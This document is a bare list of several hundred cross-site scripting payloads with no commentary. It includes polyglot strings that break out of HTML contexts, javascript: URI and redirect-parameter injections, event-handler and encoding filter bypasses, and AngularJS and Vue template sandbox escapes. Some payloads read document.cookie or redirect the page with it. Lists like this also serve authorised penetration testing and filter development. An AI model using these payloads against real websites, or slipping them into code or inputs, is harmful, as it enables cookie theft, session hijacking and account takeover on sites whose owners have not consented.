javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:"/*`/*\"/*' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert()//--><<sVg/onload=alert``>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script>
javascript:%ef%bb%bfalert(XSS)
javascript:'/*`/*'/*"/*\"/*<FRAME SRC= javascript:/**/-alert()//--></title></textarea></style></noscript></noembed></template></script><script>//<svg onload= alert()//</script>
javascript:(alert('XSS Success!'))()
javascript:/*"/*'/*\"/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame <svg */ onload=alert()//</script>
javascript:/*"/*'/*\"/*`/*><frame src=javascript:alert()></template </textarea </title </style </noscript </noembed </script --><<script>alert()<</script>\ /**/alert()//
javascript:/*"/*'/*`/*\"/**/ alert()//*</title></textarea></style></noscript></noembed></template></option></select></SCRIPT>--><<svg onload=alert()><frame src=javascript:alert()>
javascript:/*"/*'/*`/*\"/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*<svg <frame */ onload=alert()//</script>
javascript:/*"/*\"/*`/*'/**/ (alert())//</title></textarea></style></noscript></script></noembed></template></select><frame src=javascript:alert()--><<svg/onload=alert()>
javascript:/*"/*`/*'/*\"/*-->*/ alert()//</title></textarea></style></noscript></noembed></template></script></select><frame/onload=alert``><<svg/onload=alert()>
javascript:/*"/*`/*'/*\"/*--></title></script></textarea></noscript></style></noembed></template><script> /*<svg <frame onload=/**/alert()//</script>
javascript:/*"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script><<script> /**/alert()//<</script><frame onload=alert()>
javascript:/*"/*`/*'/*\"/*</script></style></template></select></title></textarea></noscript></noembed><frame/onload=alert()--><<svg/*/ onload=alert()//>
javascript:/*"//'//`//\"//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/<svg/*/onload= alert()//</script>
javascript:/*'-alert(1)-'*/
javascript:/*-->'//"//`//\"//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/<svg */ onload=alert()//</script>
javascript:/*--></script></textarea></style></noscript>\"</noembed>[`</template>["</select>['</title>]<<script>///<frame */ onload=alert()//<</script>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
javascript:/*/*/**/**/**/*%0D%0A%0d%0a*//**/oNclick-alert())//</style/</title/</textarEa/</script/->\x3ciframe/<iframe/oNloAd-alert(1)//>\x3e
javascript:/*`/*'/*'/*"-/*\"/**/ alert()//></title></textarea></style></select></script></noembed></noscript></template>--><<svg/onload=alert()><frame/src=javascript:alert()>
javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame <svg"///*/ onload=alert()//</script>
javascript://%0Aalert(1)
javascript://%250Aalert(1)
javascript://%250Alert(document.location=document.cookie)
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0A onclick=alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" %0D %0A onclick=alert(123)//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript://anything%0D%0A%0D%0Awindow.alert(1)
javascript:\/\/%250Aalert(1)
javascript:\\\/\\\/%250Aalert(1)
javascript:\\\\\\\/\\\\\\\/%250Aalert(1)
javascript:\\\\\\\\\\\\\\\/\\\\\\\\\\\\\\\/%250Aalert(1)
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>`
javascript:alert('1')"*alert(1)*"
javascript:alert()"//</title></textarea></style></noscript></noembed></template></script>\"//'//`//--><script>//<svg <frame */onload= alert()//</script>
javascript:alert()//"/*`/*'/*\"/*--></title></textarea></noscript></noembed></template></style></script>*/ alert()//<frame onload=alert()><<script>alert()<</script>
javascript:alert()//'//"//\"//-->`//*/ alert();//</title></textarea></style></noscript></noembed></template><frame onload=alert()></select></script><<svg onload=alert()>
javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//</style></template/</title/</textarea/</noscript/</noembed/</script>--><frame <svg onload=alert()><script>alert()</script>
javascript:alert()//'//"//`//></a></option></select></template></noscript></script></title></style></textarea></noembed>--><<svg onload=alert()>\">alert()//*/ alert()//<frame src=javascript:alert()>
javascript:alert()//*-->*`/*'/*"/*\"/*</title></textarea></style></noscript></noembed></template><frame src=javascript:alert()></script><script>/*<svg onload=alert()>*/ alert()//</script>
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
javascript:alert()//--></title></style></noscript></noembed></template></select></textarea><frameset onload=alert()></script>*///\"//`//'//"//><svg <svg onload=alert()> alert()//
javascript:alert()//\"//`//'//"//--></style></select></noscript></noembed></template></title></textarea></script><iframe/srcdoc="<svg/onload=alert()>"><frame/onload=alert()>*/ alert()//
javascript:alert(1)
javascript:alert(1);/////
javascript:alert(1)?q=%26callback%3Durc_button.click%23
javascript:alert(document.domain);
javascript:document.body.onclick=alert(1)
javascript:var a=document.createElement('a');a.href='javascript:alert(1)';document.body.appendChild(a)
javascript:var img=document.createElement('img');img.src='';document.body.appendChild(img);img.onerror=alert(1)
javascript:var{a:onerror}={a:alert};throw%20document.domain
javascript:x='%27-alert(1)-%27';
javascript:{ alert`0` }
location='javaScriPt:alert\x2845\x29'
location=/javascript:alert%2823%29/.source;
mrco24"type=image src onerror="alert(1)"
navigation.navigate`javascript:alert\x2823\x29`
onblur=”alert(‘XSS’)
onchange=”alert(‘XSS’)
onclick=”alert(‘XSS’)
onerror="alert('XSS')"
onerror=alert();><script>alert();</script>
onerror=alert(0);>
onerror=alert;throw 23;
onerror=eval;throw'=alert\x2823\x29';
onerror=eval;throw'alert\x2845\x29';
onerror=”alert(‘XSS’)
onfocus=JaVaSCript:alert(123) autofocus
onfocus=alert&#x00000000028;1&#x00000000029; autofocus>
onfocus=”alert(‘XSS’)
oninput=”alert(‘XSS’)
onkeydown=”alert(‘XSS’)
onload=\"a='alert()';d='XSS ';b='t(d)';c=a+b;console.log(eval(c));
onload=alert(1)>
onload=”alert(‘XSS’)
onmouseover=”alert(‘XSS’)
onpointerover=”alert(‘XSS’)
onsubmit=”alert(‘XSS’)
onx+%00+onpointerenter%3dalert(domain)+x
param A=<script>alert("
parameter=<svg/&parameter=onload=alert()>
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
pods/ppt.aspx?&fileName=')}, 1000); alert('xss')://
q="><img/src/onerror=.1|alert`` class=d>
q=javascript:alert(document.domain)
quot;">"onmousemove=alert('flag{THIS_IS_THE_FLAG}');"@evil.com</a>
redirect.asp?url=javascript://%250Aalert(document.domain)
redirect.aspx?url=javascript://%250Aalert(document.domain)
redirect?url=javascript://%250Aalert(document.domain)
ryp3i"accesskey="x"onclick="alert(1)"//opk15
s = '"><script>alert(1)</script>' print 'eval(String.fromCharCode('+",".join([str(ord(o)) for o in s])+'))'
search?q=<img/src/onerror=alert(`bluesecc`)>
search?q=javascript:alert(document.domain)
secbreake@gmail.com\u003C/script\u003E\u003Cscript\u003Ealert(document.domain)//
setInterval`alert\x2823\x29`
setTimeout`alert\x2823\x29`
src=x:alert(alt) alt=3117
svg/onload=alert(document.cookie)abcdef@test.com
tagName%2BinnerHTML%2Blocation.hash%3E/*click%20me!#*/alert(document.domain)
test%22%7D%29%3B%7D%29%3Balert%281%29%3B%2f%2f
test';alert`1`;a='test
test+(<script>alert(0)</script>)@gmail.com
test123";(alert)("xss")//
test<i>test</i><a onmouseover="alert(document.cookie)">
test@example(<script>alert(0)</script>).com
test@gmail.com%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E
test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
testtest”+onmouseover%3D”alert%26%230000000040%3Bdocument[‘cookie’])
themecolor=%22-alert('XSS')-%22
this['alert']()
throw onerror=eval,SyntaxError`alert\x2823\x29`
throw/**/Uncaught=window.onerror=eval,&quot;;alert\5023\51&quot;
throw{},onerror??=alert,"XSS"??123
top['alert'](3)
url=%26%2302java%26%23115cript:alert(document.domain)
var{haha:onerror=alert}=0;throw 1
video-js.swf?readyFunction=alert(1)
window.name="<img src=x onerror=alert(23)>"
window.name="alert(23)";
window.name="javascript:alert(23)";
window.name='javascript:alert(23)';
window.name='javascript:alert\x2823\x29';
window['alert']()
with(document)alert(cookie)
x" onerror=alert('Qusai") x="
x");$=alert, $(1);//
x"><svg%0Donload="window['alert']((document)['cookie'])">
x"><svg%0Donload="window['alert'](document.cookie)">
x"><svg%0Donload="window['alert'](document['cookie'])"
x"><svg%0Donload="window['alert'](document['cookie'])">
x"><svg%0Donload=`window["alert"](((document)['cookie']))`>
x"><svg%0Donload=`window['alert']((document)['cookie'])`>
x"><svg%250donload%3D"window%5B%27alert%27%5D(location[%27hostname%27])"
x"><x a="><script>alert(1)</script>
x%22%20onerror%3Dalert%28%27Qusai%22%29%20x%3D%22
x'><svg%0Donload='window["alert"](document.cookie)'>
x='javascript:alert\x2823\x29';x={x:location}=this
x=1}}};alert(1)//
x\"><svg%0Donload=\"window[\'alert\']((document)[\'cookie\'])\">
xss"><!--><svg/onload=alert(document.domain)>
xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
xss:&#101;x&#x2F; *XSS*//*//pression(alert("XSS"))'>
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
{alert('document.cookie')}
{onerror=alert}throw 23
{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}
{{$emit.constructor`alert(1)`()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert("CodePrefer")')()}}
{{$on.constructor('alert(1)')()}}
{{''.constructor.constructor('alert(1)')()}}
{{'a'.constructor('alert(1)')()}}
{{'a'.constructor.constructor('alert(1)')()}}
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\u002ex)alert(window\u002ex=1)')+eval(y)+\"'");}}}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
{{0[a='constructor'][a]('alert(1)')()}}
{{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}
{{_Vue.h.constructor`alert(1)`()}}
{{_c.constructor('alert(1)')()}}
{{_openBlock.constructor('alert(1)')()}}
{{_s.constructor('alert(1)')()}}
{{_toDisplayString.constructor('alert(1)')()}}
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
{{constructor.constructor("alert(0)")()}}
{{constructor.constructor('alert(/XSS Stored!/)')()}}
{{constructor.constructor('alert(1)')()}}
{{constructor.constructor(alert`1`)()}}
{{constructor.constructor(‘alert(1)’)()}}
{{toString.constructor.prototype.charAt=toString.constructor.prototype.substr;alert(toString.constructor.fromCharCode(97,108,101,114,116,40,49,41))}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
{{{{constructor.constructor('alert(\"XSS\")')()}}
{{{}.")));alert(1)//"}}
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
{}.")));alert(1)//";
}}}</script><script>alert(1)</script>
~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E"
«input»; p=-alert(1)}//\ $result* var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"};
«input»; p=\&q=-alert(1)// $result* var n = {a: "\", b: "-alert(1)}//"};
¼script¾alert(¢XSS¢)¼/script¾
‘ onfocus=’alert(1)’
‘ onfocus=’alert(1)’ autofocus=’
‘ onmouseover=’alert(1)’
‘onfocus=’alert(1)’
“ =”” ‘></><script></script><svg onload”=”alertonload=alert(1)””
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
“=””’></><script></script><svg onload=alert(1)>
“>-setTimeout`\u0028alert(1)\u0029`-’
“><img onerror=alert(1) src>
“><img only src=1 onerror=alert()>
“><script>alert(1);</script>
“`’><script>\x0Djavascript:alert(document.cookie)</script>
“autofocus onclick=’alert()
“javascript:var{a:onerror}={a:alert};throw%20document.cookie”
”&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;svg onload=alert&amp;amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;amp;gt;
”&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert&amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;gt;
”&amp;amp;gt;&amp;amp;lt;svg onload=alert&amp;amp;amp;#0000000040"1")&amp;amp;gt;
”&amp;gt;&amp;lt;svg onload=alert&amp;amp;#0000000040"1")&amp;gt;
”&gt;&lt;svg onload=alert&amp;#0000000040"1")&gt;
”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/>
”><svg onload=alert&#0000000040"1")>
嘼img src=1 onerror=alert(1)嘾
嘾嘾<script>alert(2);</script>
＜script＞alert(123)＜/script＞